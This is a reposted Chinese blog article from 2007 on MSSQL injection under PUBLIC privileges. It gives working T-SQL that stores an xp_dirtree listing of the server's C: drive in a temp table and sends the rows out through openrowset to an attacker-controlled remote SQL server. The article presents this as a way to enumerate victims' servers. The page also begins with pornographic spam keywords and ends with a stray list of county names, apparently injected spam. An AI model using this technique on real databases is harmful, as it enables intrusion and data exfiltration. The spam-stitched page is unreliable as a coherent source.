最新国产好看的视频,伊人天堂AV在线,国产Aaaaaa视频,蜜臀视频在线观看一区,人妻av色图,密臀久久久精品影片,青青视频免费观看毛片,久草在线观看视,国产三级精品色情在线

MSSQL注入PUBLIC權(quán)限下的xp_dirtree再度利用方法

 更新時間:2007年10月08日 22:50:16   作者:  
軟件作者:kj021320
信息來源:I.S.T.O技術(shù)團(tuán)隊(http://blog.csdn.net/I_S_T_O/)


本來這文章在TEAM里面放了好久的了!只是<<art of sql injection>>的一個小部分,可惜寫了好久資料收集了好多但是估計年底都沒能出來~那就先發(fā)出來了!主要是MSSQL2005都來了!2K的話沒多久就會給淘汰了~拿出來跟大家交流吧~廣告說完了...

正文:

提起public權(quán)限的用戶估計很多人也覺得郁悶了吧~N久以前看了一篇《論在mssql中public和db_owner權(quán)限下拿到webshell或是系統(tǒng)權(quán)限》的文章(名字真長-_-!!!),里面說到?jīng)]辦法利用xp_regread,xp_dirtree…這些存儲過程,原因是public沒有辦法建表,我在這里矯正一下其實public是可以建表的~呵呵,使這些存儲過程能利用上,看下面的代碼吧

--建立一個臨時表,一般的表我們是無辦法建立的,我們只能建立臨時表

create table ##nonamed(

       dir ntext,

       num int

)

--調(diào)用存儲過程把執(zhí)行回來的數(shù)據(jù)存到臨時表里面

insert ##nonamed execute master..xp_dirtree 'c:\',1

--然后采用openrowset函數(shù)把臨時表的數(shù)據(jù)導(dǎo)到本地MSSQL 的dirtree表里面了

insert into openrowset('sqloledb', '192.0.0.1';'user';'pass', 'select * from Northwind.dbo.dirtree')

select * from ##nonamed

以上方法,也就是說public可以遍歷用戶服務(wù)器的目錄 具體有什么利用價值嘛~呵呵見仁見智了 


Trackback: http://tb.blog.csdn.net/TrackBack.aspx?PostId=1736964

相關(guān)文章

最新評論

镇赉县| 海淀区| 东辽县| 行唐县| 福安市| 抚州市| 金沙县| 息烽县| 江津市| 延津县| 射阳县| 建昌县| 秦安县| 壤塘县| 凌源市| 长阳| 阳西县| 临邑县| 阜城县| 竹山县| 务川| 都匀市| 天台县| 长沙县| 若羌县| 涟水县| 楚雄市| 元江| 海林市| 夏邑县| 攀枝花市| 通河县| 玉山县| 巩义市| 虞城县| 蒙山县| 丹江口市| 玛多县| 吐鲁番市| 宜兴市| 西乌珠穆沁旗|